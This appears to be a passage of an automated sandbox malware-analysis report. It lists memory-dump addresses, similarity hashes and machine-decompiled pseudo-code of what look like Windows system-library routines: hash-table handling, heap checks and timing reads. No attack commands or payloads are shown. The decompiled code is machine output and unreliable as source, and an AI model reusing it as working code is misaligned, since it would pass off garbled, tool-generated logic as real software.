                                                    0x1d7f505d
                                                    0x1d7f5060
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f506f
                                                    0x1d7a08a2
                                                    0x1d7a08a5
                                                    0x1d7f5079
                                                    0x1d7f507f
                                                    0x1d7f5086
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f5091
                                                    0x1d7f5093
                                                    0x1d7f50a5
                                                    0x1d7f5095
                                                    0x1d7f509e
                                                    0x1d7f509e
                                                    0x1d7f50af
                                                    0x1d7f50be
                                                    0x1d7a08ae
                                                    0x1d7a08b4
                                                    0x1d7a08b9
                                                    0x1d7f50c8
                                                    0x1d7f50cb
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f50da
                                                    0x1d7a08c4
                                                    0x1d7a08c7
                                                    0x1d7f50e9
                                                    0x1d7f50eb
                                                    0x1d7f50fd
                                                    0x1d7f50ed
                                                    0x1d7f50f6
                                                    0x1d7f50f6
                                                    0x1d7f5113
                                                    0x1d7f5113
                                                    0x00000000
                                                    0x1d7a08cd
                                                    0x1d7a08bf
                                                    0x1d7a08bf
                                                    0x00000000
                                                    0x1d7a08bf
                                                    0x1d7a08ab
                                                    0x1d7a08ab
                                                    0x00000000
                                                    0x1d7a08ab
                                                    0x1d7a089d
                                                    0x1d7a089d
                                                    0x00000000
                                                    0x1d7a089d
                                                    0x1d7a07f0
                                                    0x1d7a07f0
                                                    0x1d7a07f8
                                                    0x1d7f5014
                                                    0x1d7f5017
                                                    0x1d7f501a
                                                    0x1d7f5036
                                                    0x1d7f503d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f501c
                                                    0x1d7f501c
                                                    0x1d7f501c
                                                    0x1d7f501e
                                                    0x1d7f5020
                                                    0x1d7f5023
                                                    0x1d7f5026
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f5028
                                                    0x1d7f502b
                                                    0x1d7f502e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f5030
                                                    0x1d7f5035
                                                    0x1d7f5035
                                                    0x00000000
                                                    0x1d7f5035
                                                    0x1d7a07fe
                                                    0x1d7a07fe
                                                    0x1d7a0801
                                                    0x1d7a0803
                                                    0x1d7a0808
                                                    0x1d7f5053
                                                    0x1d7a0816
                                                    0x1d7a0816
                                                    0x1d7a0818
                                                    0x1d7a0818
                                                    0x00000000
                                                    0x1d7a0808
                                                    0x1d7a07ee
                                                    0x1d7a0789
                                                    0x1d7a0789
                                                    0x00000000
                                                    0x1d7a0789
                                                    0x1d7a0732
                                                    0x1d7a0736
                                                    0x1d7f4f63
                                                    0x1d7f4f66
                                                    0x1d7f4f66
                                                    0x1d7f4f6b
                                                    0x1d7f4f6d
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f4f76
                                                    0x1d7f4f79
                                                    0x1d7f4f7b
                                                    0x1d7f4f8d
                                                    0x1d7f4f92
                                                    0x1d7f4f92
                                                    0x1d7f4f95
                                                    0x00000000
                                                    0x1d7f4f95
                                                    0x1d7a073c
                                                    0x1d7a0742
                                                    0x1d7a074b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7a074b
                                                    0x1d7a06ff

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-4253913091
                                                    • Opcode ID: aca7565c99816fbdcbf3f9305e55ede2a097b2ffa3f8677d792f6ec184214c82
                                                    • Instruction ID: d98860afc90b30bcd83ae0cdaaa5153843c2eddb50f5b843f615c2dd51eb479e
                                                    • Opcode Fuzzy Hash: aca7565c99816fbdcbf3f9305e55ede2a097b2ffa3f8677d792f6ec184214c82
                                                    • Instruction Fuzzy Hash: 42F1FE34A00616DFDB16CF28C884B6AB7F1FF44724F1886A9E5199B395D730F981CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D86ACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 45%
                                                    			E1D86ACEB(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int* _v12;
				signed char _v13;
				signed char _v14;
				signed char _v16;
				signed int _v20;
				signed int _v21;
				signed int _v22;
				signed char _v24;
				signed char _v25;
				signed char _v26;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int* _t146;
				signed int _t149;
				signed int _t151;
				signed int _t167;
				signed int _t169;
				signed int _t173;
				signed char _t176;
				signed int _t195;
				void* _t211;
				signed int _t250;
				signed int _t251;
				signed int _t253;
				intOrPtr* _t254;
				signed int _t261;
				signed char _t267;
				signed char _t274;
				intOrPtr _t283;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				intOrPtr _t295;
				signed int _t297;
				signed int* _t304;
				signed char _t305;
				void* _t333;
				unsigned int _t335;
				signed int _t336;
				signed char _t337;
				unsigned int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				intOrPtr _t349;
				signed char _t351;
				signed int _t353;
				signed char _t354;
				unsigned int _t355;
				unsigned int _t356;
				signed int _t358;
				unsigned int _t360;
				void* _t361;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t371;
				void* _t372;
				signed char* _t374;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t380;
				signed char _t381;
				unsigned int _t383;

				_t146 = __edx;
				_v8 = __ecx;
				_v12 = __edx;
				_t251 = 0x4cb2f;
				_t3 = _t146 + 4; // 0x8b0775c0
				_t374 =  *_t3;
				_t360 =  *__edx << 2;
				if(_t360 < 8) {
					L3:
					_t361 = _t360 - 1;
					if(_t361 == 0) {
						L16:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						L17:
						_t375 = _v8;
						_t12 = _t375 + 0x1c; // 0x1d86abd2
						_v24 = _t12;
						_t149 = L1D7953C0(_t12);
						_t362 = 0;
						while(1) {
							L18:
							_t14 = _t375 + 4; // 0x8bf8558b
							_t335 =  *_t14;
							_t151 = (_t149 | 0xffffffff) << (_t335 & 0x0000001f);
							_t267 = _t251 & _t151;
							_v28 = _t151;
							_v20 = _t267;
							_v16 = _t267;
							if(_t362 != 0) {
								goto L21;
							}
							_t356 = _t335 >> 5;
							if(_t356 == 0) {
								_t362 = 0;
								L30:
								if(_t362 == 0) {
									L34:
									_t33 = _t375 + 0x1c; // 0x1d86abd2
									E1D7952F0(_t267, _t33);
									_t35 = _t375 + 0x28; // 0x8b0a74f6
									_t36 = _t375 + 0x20; // 0x8bb372c7
									 *0x1d8891e0(0xc +  *_v12 * 4,  *_t35);
									_t337 =  *((intOrPtr*)( *_t36))();
									_v16 = _t337;
									if(_t337 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										 *(_t337 + 8) =  *(_t337 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t337 + 0xb)) =  *_v12;
										 *(_t337 + 4) = _t251;
										_t46 = _t337 + 0xc; // 0xc
										_t167 = L1D7A2330(E1D7D88C0(_t46, _v12[1],  *_v12 << 2), _v24);
										_t377 = _v8;
										_t364 = 0;
										do {
											_t49 = _t377 + 4; // 0x8bf8558b
											_t338 =  *_t49;
											_t169 = (_t167 | 0xffffffff) << (_t338 & 0x0000001f);
											_v28 = _t169;
											_t274 = _t169 & _t251;
											_v20 = _t274;
											_v24 = _t274;
											if(_t364 != 0) {
												L40:
												_t339 = _v28;
												while(1) {
													_t364 =  *_t364;
													if((_t364 & 0x00000001) != 0) {
														break;
													}
													if(_t274 == ( *(_t364 + 4) & _t339)) {
														L45:
														if(_t364 == 0) {
															L52:
															_t253 = _t377;
															_t68 = _t253 + 0x28; // 0x8b0a74f6
															_t69 = _t253 + 4; // 0x8bf8558b
															_t378 =  *_t69;
															_t70 = _t253 + 0x20; // 0x8bb372c7
															_t365 =  *_t70;
															_v28 =  *_t68;
															_t72 = _t253 + 0x24; // 0x85f633fe
															_v40 =  *_t72;
															_t173 = _t378 >> 5;
															if( *_t253 < _t173 + _t173) {
																L73:
																_t380 = _v16;
																_t364 = _t380;
																_t176 = (_t173 | 0xffffffff) << (_t378 & 0x0000001f) &  *(_t380 + 4);
																_v40 = _t176;
																_v28 = _t176;
																_t343 = (_t378 >> 0x00000005) - 0x00000001 & ((((_t176 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_v40 & 0x000000ff)) * 0x00000025 + (_v26 & 0x000000ff)) * 0x00000025 + (_v25 & 0x000000ff);
																_t136 = _t253 + 8; // 0xc183f44d
																_t283 =  *_t136;
																 *_t380 =  *(_t283 + _t343 * 4);
																 *(_t283 + _t343 * 4) = _t380;
																 *_t253 =  *_t253 + 1;
																_t381 = 0;
																L74:
																_t141 = _t253 + 0x1c; // 0x1d86abd2
																E1D7A24D0(_t141);
																if(_t381 != 0) {
																	_t142 = _t253 + 0x28; // 0x8b0a74f6
																	_t143 = _t253 + 0x24; // 0x85f633fe
																	 *0x1d8891e0(_t381,  *_t142);
																	 *((intOrPtr*)( *_t143))();
																}
																L76:
																return _t364;
															}
															_t285 = 2;
															_t173 = E1D7C4CF8( &_v24, _t173 * _t285, _t173 * _t285 >> 0x20);
															if(_t173 < 0) {
																goto L73;
															}
															_t383 = _v24;
															if(_t383 < 4) {
																_t383 = 4;
															}
															 *0x1d8891e0(_t383 << 2, _v28);
															_t173 =  *_t365();
															_t345 = _t173;
															_v12 = _t345;
															if(_t345 == 0) {
																_t144 = _t253 + 4; // 0x8bf8558b
																_t378 =  *_t144;
																if(_t378 >= 0x20) {
																	goto L73;
																}
																_t381 = _v16;
																_t364 = 0;
																goto L74;
															} else {
																_t83 = _t383 - 1; // 0x3
																_t288 = _t83;
																if((_t383 & _t288) == 0) {
																	L61:
																	if(_t383 > 0x4000000) {
																		_t383 = 0x4000000;
																	}
																	_t366 = _t345;
																	_v24 = _v24 & 0x00000000;
																	_t195 = _t253 | 0x00000001;
																	asm("sbb ecx, ecx");
																	_t292 =  !( &(_v12[_t383])) & _t383 << 0x00000002 >> 0x00000002;
																	if(_t292 <= 0) {
																		L66:
																		_t92 = _t253 + 4; // 0x8bf8558b
																		_t367 = 0;
																		_v32 = (_t195 | 0xffffffff) << ( *_t92 & 0x0000001f);
																		if(( *(_t253 + 4) & 0xffffffe0) <= 0) {
																			L71:
																			_t121 = _t253 + 8; // 0xc183f44d
																			_t295 =  *_t121;
																			 *((intOrPtr*)(_t253 + 8)) = _v12;
																			_t124 = _t253 + 4; // 0x8bf8558b
																			_t173 =  *_t124 & 0x0000001f;
																			_t378 = _t383 << 0x00000005 | _t173;
																			 *(_t253 + 4) = _t378;
																			if(_t295 != 0) {
																				 *0x1d8891e0(_t295, _v28);
																				_t173 =  *_v40();
																				_t128 = _t253 + 4; // 0x8bf8558b
																				_t378 =  *_t128;
																			}
																			goto L73;
																		} else {
																			goto L67;
																		}
																		do {
																			L67:
																			_t97 = _t253 + 8; // 0xc183f44d
																			_t349 =  *_t97;
																			_v36 = _t349;
																			while(1) {
																				_t297 =  *(_t349 + _t367 * 4);
																				_v20 = _t297;
																				if((_t297 & 0x00000001) != 0) {
																					goto L70;
																				}
																				 *(_t349 + _t367 * 4) =  *_t297;
																				_t351 =  *(_t297 + 4) & _v32;
																				_t254 = _v20;
																				_v24 = _t351;
																				_t353 = _t383 - 0x00000001 & ((((_t351 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_t351 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025 + (_v21 & 0x000000ff);
																				_t304 = _v12;
																				 *_t254 =  *((intOrPtr*)(_t304 + _t353 * 4));
																				 *((intOrPtr*)(_t304 + _t353 * 4)) = _t254;
																				_t349 = _v36;
																			}
																			L70:
																			_t253 = _v8;
																			_t367 = _t367 + 1;
																			_t120 = _t253 + 4; // 0x8bf8558b
																		} while (_t367 <  *_t120 >> 5);
																		goto L71;
																	} else {
																		_t354 = _v24;
																		do {
																			_t354 = _t354 + 1;
																			 *_t366 = _t195;
																			_t366 = _t366 + 4;
																		} while (_t354 < _t292);
																		goto L66;
																	}
																}
																_t305 = _t288 | 0xffffffff;
																if(_t383 == 0) {
																	L60:
																	_t383 = 1 << _t305;
																	goto L61;
																} else {
																	goto L59;
																}
																do {
																	L59:
																	_t305 = _t305 + 1;
																	_t383 = _t383 >> 1;
																} while (_t383 != 0);
																goto L60;
															}
														}
														goto L46;
													}
												}
												_t364 = 0;
												goto L45;
											}
											_t355 = _t338 >> 5;
											if(_t355 == 0) {
												_t364 = 0;
												L49:
												if(_t364 == 0) {
													goto L52;
												}
												_t66 = _t364 + 8; // 0x8
												_t211 = E1D86AC6F(_t66);
												_t253 = _t377;
												_t381 = _v16;
												if(_t211 == 0) {
													_t364 = 0;
												}
												goto L74;
											}
											_t56 = _t355 - 1; // 0x8bf8558a
											_t57 = _t377 + 8; // 0xc183f44d
											_t364 =  *_t57 + (_t56 & (_v21 & 0x000000ff) + 0x164b2f3f + (((_t274 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025) * 4;
											_t274 = _v20;
											goto L40;
											L46:
											_t167 = E1D86ACB2(_t364, _v12);
										} while (_t167 == 0);
										goto L49;
									}
									_t364 = 0;
									goto L76;
								}
								_t31 = _t362 + 8; // 0x8
								_t314 = _t31;
								if(E1D86AC6F(_t31) == 0) {
									_t364 = 0;
								}
								E1D7952F0(_t314, _v24);
								goto L76;
							}
							_t21 = _t356 - 1; // 0x8bf8558a
							_t22 = _t375 + 8; // 0xc183f44d
							_t362 =  *_t22 + (_t21 & (_v13 & 0x000000ff) + 0x164b2f3f + (((_t267 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v14 & 0x000000ff)) * 0x00000025) * 4;
							_t267 = _v20;
							L21:
							_t336 = _v28;
							while(1) {
								_t362 =  *_t362;
								if((_t362 & 0x00000001) != 0) {
									break;
								}
								if(_t267 == ( *(_t362 + 4) & _t336)) {
									L26:
									if(_t362 == 0) {
										goto L34;
									}
									_t149 = E1D86ACB2(_t362, _v12);
									if(_t149 != 0) {
										goto L30;
									}
									goto L18;
								}
							}
							_t362 = 0;
							goto L26;
						}
					}
					_t368 = _t361 - 1;
					if(_t368 == 0) {
						L15:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L16;
					}
					_t369 = _t368 - 1;
					if(_t369 == 0) {
						L14:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L15;
					}
					_t370 = _t369 - 1;
					if(_t370 == 0) {
						L13:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L14;
					}
					_t371 = _t370 - 1;
					if(_t371 == 0) {
						L12:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L13;
					}
					_t372 = _t371 - 1;
					if(_t372 == 0) {
						L11:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L12;
					}
					if(_t372 != 1) {
						goto L17;
					} else {
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L11;
					}
				} else {
					_t358 = _t360 >> 3;
					_t360 = _t360 + _t358 * 0xfffffff8;
					do {
						_t333 = ((((((_t374[1] & 0x000000ff) * 0x25 + (_t374[2] & 0x000000ff)) * 0x25 + (_t374[3] & 0x000000ff)) * 0x25 + (_t374[4] & 0x000000ff)) * 0x25 + (_t374[5] & 0x000000ff)) * 0x25 + (_t374[6] & 0x000000ff)) * 0x25 - _t251 * 0x2fe8ed1f;
						_t261 = ( *_t374 & 0x000000ff) * 0x1a617d0d;
						_t250 = _t374[7] & 0x000000ff;
						_t374 =  &(_t374[8]);
						_t251 = _t261 + _t333 + _t250;
						_t358 = _t358 - 1;
					} while (_t358 != 0);
					goto L3;
				}
			}












































































                                                    0x1d86acf4
                                                    0x1d86acf6
                                                    0x1d86acfb
                                                    0x1d86acfe
                                                    0x1d86ad05
                                                    0x1d86ad05
                                                    0x1d86ad08
                                                    0x1d86ad0e
                                                    0x1d86ad6f
                                                    0x1d86ad6f
                                                    0x1d86ad72
                                                    0x1d86adc8
                                                    0x1d86adce
                                                    0x1d86add0
                                                    0x1d86add0
                                                    0x1d86add3
                                                    0x1d86add7
                                                    0x1d86adda
                                                    0x1d86addf
                                                    0x1d86ade1
                                                    0x1d86ade1
                                                    0x1d86ade1
                                                    0x1d86ade1
                                                    0x1d86adec
                                                    0x1d86adf0
                                                    0x1d86adf2
                                                    0x1d86adf5
                                                    0x1d86adf8
                                                    0x1d86adfd
                                                    0x00000000
                                                    0x00000000
                                                    0x1d86adff
                                                    0x1d86ae04
                                                    0x1d86ae69
                                                    0x1d86ae6b
                                                    0x1d86ae6d
                                                    0x1d86ae8b
                                                    0x1d86ae8b
                                                    0x1d86ae8f
                                                    0x1d86ae97
                                                    0x1d86ae9a
                                                    0x1d86aea9
                                                    0x1d86aeb1
                                                    0x1d86aeb3
                                                    0x1d86aeb8
                                                    0x1d86aec8
                                                    0x1d86aec9
                                                    0x1d86aeca
                                                    0x1d86aed6
                                                    0x1d86aedb
                                                    0x1d86aede
                                                    0x1d86aeea
                                                    0x1d86aef9
                                                    0x1d86aefe
                                                    0x1d86af01
                                                    0x1d86af03
                                                    0x1d86af03
                                                    0x1d86af03
                                                    0x1d86af0e
                                                    0x1d86af12
                                                    0x1d86af15
                                                    0x1d86af17
                                                    0x1d86af1a
                                                    0x1d86af1f
                                                    0x1d86af5b
                                                    0x1d86af5b
                                                    0x1d86af5e
                                                    0x1d86af5e
                                                    0x1d86af66
                                                    0x00000000
                                                    0x00000000
                                                    0x1d86af6f
                                                    0x1d86af75
                                                    0x1d86af77
                                                    0x1d86afae
                                                    0x1d86afae
                                                    0x1d86afb0
                                                    0x1d86afb3
                                                    0x1d86afb3
                                                    0x1d86afb6
                                                    0x1d86afb6
                                                    0x1d86afb9
                                                    0x1d86afbc
                                                    0x1d86afbf
                                                    0x1d86afc4
                                                    0x1d86afcc
                                                    0x1d86b11b
                                                    0x1d86b128
                                                    0x1d86b12d
                                                    0x1d86b12f
                                                    0x1d86b132
                                                    0x1d86b135
                                                    0x1d86b15e
                                                    0x1d86b160
                                                    0x1d86b160
                                                    0x1d86b166
                                                    0x1d86b168
                                                    0x1d86b16b
                                                    0x1d86b16d
                                                    0x1d86b16f
                                                    0x1d86b16f
                                                    0x1d86b173
                                                    0x1d86b17a
                                                    0x1d86b17c
                                                    0x1d86b180
                                                    0x1d86b185
                                                    0x1d86b18b
                                                    0x1d86b18b
                                                    0x1d86b18d
                                                    0x1d86b193
                                                    0x1d86b193
                                                    0x1d86afd4
                                                    0x1d86afdc
                                                    0x1d86afe3
                                                    0x00000000
                                                    0x00000000
                                                    0x1d86afe9
                                                    0x1d86afef
                                                    0x1d86aff3
                                                    0x1d86aff3
                                                    0x1d86afff
                                                    0x1d86b005
                                                    0x1d86b007
                                                    0x1d86b009
                                                    0x1d86b00e
                                                    0x1d86b194
                                                    0x1d86b194
                                                    0x1d86b19a
                                                    0x00000000
                                                    0x00000000
                                                    0x1d86b1a0
                                                    0x1d86b1a3
                                                    0x00000000
                                                    0x1d86b014
                                                    0x1d86b014
                                                    0x1d86b014
                                                    0x1d86b019
                                                    0x1d86b02c
                                                    0x1d86b033
                                                    0x1d86b035
                                                    0x1d86b035
                                                    0x1d86b03a
                                                    0x1d86b03c
                                                    0x1d86b049
                                                    0x1d86b052
                                                    0x1d86b056
                                                    0x1d86b058
                                                    0x1d86b067
                                                    0x1d86b067
                                                    0x1d86b070
                                                    0x1d86b07b
                                                    0x1d86b07e
                                                    0x1d86b0ec
                                                    0x1d86b0ec
                                                    0x1d86b0ec
                                                    0x1d86b0f2
                                                    0x1d86b0f5
                                                    0x1d86b0fb
                                                    0x1d86b0fe
                                                    0x1d86b100
                                                    0x1d86b105
                                                    0x1d86b110
                                                    0x1d86b116
                                                    0x1d86b118
                                                    0x1d86b118
                                                    0x1d86b118
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d86b080
                                                    0x1d86b080
                                                    0x1d86b080
                                                    0x1d86b080
                                                    0x1d86b083
                                                    0x1d86b086
                                                    0x1d86b086
                                                    0x1d86b089
                                                    0x1d86b092
                                                    0x00000000
                                                    0x00000000
                                                    0x1d86b096
                                                    0x1d86b09c
                                                    0x1d86b0a7
                                                    0x1d86b0b0
                                                    0x1d86b0ca
                                                    0x1d86b0cc
                                                    0x1d86b0d2
                                                    0x1d86b0d6
                                                    0x1d86b0d9
                                                    0x1d86b0d9
                                                    0x1d86b0de
                                                    0x1d86b0de
                                                    0x1d86b0e1
                                                    0x1d86b0e2
                                                    0x1d86b0e8
                                                    0x00000000
                                                    0x1d86b05a
                                                    0x1d86b05a
                                                    0x1d86b05d
                                                    0x1d86b05d
                                                    0x1d86b05e
                                                    0x1d86b060
                                                    0x1d86b063
                                                    0x00000000
                                                    0x1d86b05d
                                                    0x1d86b058
                                                    0x1d86b01b
                                                    0x1d86b020
                                                    0x1d86b027
                                                    0x1d86b02a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d86b022
                                                    0x1d86b022
                                                    0x1d86b022
                                                    0x1d86b023
                                                    0x1d86b023
                                                    0x00000000
                                                    0x1d86b022
                                                    0x1d86b00e
                                                    0x00000000
                                                    0x1d86af77
                                                    0x1d86af71
                                                    0x1d86af73
                                                    0x00000000
                                                    0x1d86af73
                                                    0x1d86af21
                                                    0x1d86af26
                                                    0x1d86af8c
                                                    0x1d86af8e
                                                    0x1d86af90
                                                    0x00000000
                                                    0x00000000
                                                    0x1d86af92
                                                    0x1d86af95
                                                    0x1d86af9a
                                                    0x1d86af9c
                                                    0x1d86afa1
                                                    0x1d86afa7
                                                    0x1d86afa7
                                                    0x00000000
                                                    0x1d86afa1
                                                    0x1d86af4d
                                                    0x1d86af52
                                                    0x1d86af55
                                                    0x1d86af58
                                                    0x00000000
                                                    0x1d86af79
                                                    0x1d86af7d
                                                    0x1d86af82
                                                    0x00000000
                                                    0x1d86af8a
                                                    0x1d86aeba
                                                    0x00000000
                                                    0x1d86aeba
                                                    0x1d86ae6f
                                                    0x1d86ae6f
                                                    0x1d86ae79
                                                    0x1d86ae7b
                                                    0x1d86ae7b
                                                    0x1d86ae81
                                                    0x00000000
                                                    0x1d86ae81
                                                    0x1d86ae2b
                                                    0x1d86ae30
                                                    0x1d86ae33
                                                    0x1d86ae36
                                                    0x1d86ae39
                                                    0x1d86ae39
                                                    0x1d86ae3c
                                                    0x1d86ae3c
                                                    0x1d86ae44
                                                    0x00000000
                                                    0x00000000
                                                    0x1d86ae4d
                                                    0x1d86ae53
                                                    0x1d86ae55
                                                    0x00000000
                                                    0x00000000
                                                    0x1d86ae5b
                                                    0x1d86ae62
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d86ae64
                                                    0x1d86ae4f
                                                    0x1d86ae51
                                                    0x00000000
                                                    0x1d86ae51
                                                    0x1d86ade1
                                                    0x1d86ad74
                                                    0x1d86ad77
                                                    0x1d86adbf
                                                    0x1d86adc5
                                                    0x1d86adc7
                                                    0x00000000
                                                    0x1d86adc7
                                                    0x1d86ad79
                                                    0x1d86ad7c
                                                    0x1d86adb6
                                                    0x1d86adbc
                                                    0x1d86adbe
                                                    0x00000000
                                                    0x1d86adbe
                                                    0x1d86ad7e
                                                    0x1d86ad81
                                                    0x1d86adad
                                                    0x1d86adb3
                                                    0x1d86adb5
                                                    0x00000000
                                                    0x1d86adb5
                                                    0x1d86ad83
                                                    0x1d86ad86
                                                    0x1d86ada4
                                                    0x1d86adaa
                                                    0x1d86adac
                                                    0x00000000
                                                    0x1d86adac
                                                    0x1d86ad88
                                                    0x1d86ad8b
                                                    0x1d86ad9b
                                                    0x1d86ada1
                                                    0x1d86ada3
                                                    0x00000000
                                                    0x1d86ada3
                                                    0x1d86ad90
                                                    0x00000000
                                                    0x1d86ad92
                                                    0x1d86ad98
                                                    0x1d86ad9a
                                                    0x00000000
                                                    0x1d86ad9a
                                                    0x1d86ad10
                                                    0x1d86ad12
                                                    0x1d86ad18
                                                    0x1d86ad1a
                                                    0x1d86ad54
                                                    0x1d86ad59
                                                    0x1d86ad5f
                                                    0x1d86ad63
                                                    0x1d86ad68
                                                    0x1d86ad6a
                                                    0x1d86ad6a
                                                    0x00000000
                                                    0x1d86ad1a

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID:
                                                    • API String ID: 3446177414-0
                                                    • Opcode ID: 84f8396434787804ce43917de803a4a756b0f5d3f4e4c85a5218f7f2cfc99be2
                                                    • Instruction ID: 22bb8e84acbf5f6b24f8244f8fa5dc101ec7c6ffda1b9d8168d8a8118380dbb0
                                                    • Opcode Fuzzy Hash: 84f8396434787804ce43917de803a4a756b0f5d3f4e4c85a5218f7f2cfc99be2
                                                    • Instruction Fuzzy Hash: 2CF10973E006159FCB08CF69C99067EFBF5EF8822071A416DE456DB390D634E941CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7BEE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 74%
                                                    			E1D7BEE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t215;
				signed int _t222;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t244;
				signed int _t247;
				char* _t250;
				intOrPtr _t255;
				signed int _t269;
				signed int* _t270;
				intOrPtr _t279;
				signed char _t284;
				signed int _t291;
				signed int _t292;
				intOrPtr _t301;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t309;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr* _t316;
				void* _t318;

				_push(0x7c);
				_push(0x1d86c610);
				E1D7E7C40(__ebx, __edi, __esi);
				_t313 = __edx;
				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
				 *(_t318 - 0x58) = 0;
				 *((intOrPtr*)(_t318 - 0x74)) = 0;
				_t269 = 0;
				 *(_t318 - 0x64) = 0;
				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t196 = __edx + 0x28;
				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
				L1D7A2330(_t196, _t196);
				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
				L1:
				while(1) {
					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
						E1D7A24D0( *((intOrPtr*)(_t318 - 0x78)));
						asm("sbb ebx, ebx");
						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
						return  ~_t269 & 0xc000022d;
					}
					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
					_t307 = 0x7ffe0010;
					_t270 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									_t201 =  *0x1d8867f0; // 0x0
									 *(_t318 - 0x30) = _t201;
									_t202 =  *0x1d8867f4; // 0x0
									 *(_t318 - 0x3c) = _t202;
									 *(_t318 - 0x28) =  *_t270;
									 *(_t318 - 0x5c) = _t270[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t279 =  *0x7ffe0008;
										__eflags = _t301 -  *_t307;
										if(_t301 ==  *_t307) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t270 = 0x7ffe03b0;
									_t308 =  *0x7ffe03b0;
									 *(_t318 - 0x38) = _t308;
									_t206 =  *0x7FFE03B4;
									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
									__eflags =  *(_t318 - 0x28) - _t308;
									_t307 = 0x7ffe0010;
								} while ( *(_t318 - 0x28) != _t308);
								__eflags =  *(_t318 - 0x5c) - _t206;
							} while ( *(_t318 - 0x5c) != _t206);
							_t207 =  *0x1d8867f0; // 0x0
							_t309 =  *0x1d8867f4; // 0x0
							 *(_t318 - 0x28) = _t309;
							__eflags =  *(_t318 - 0x30) - _t207;
							_t307 = 0x7ffe0010;
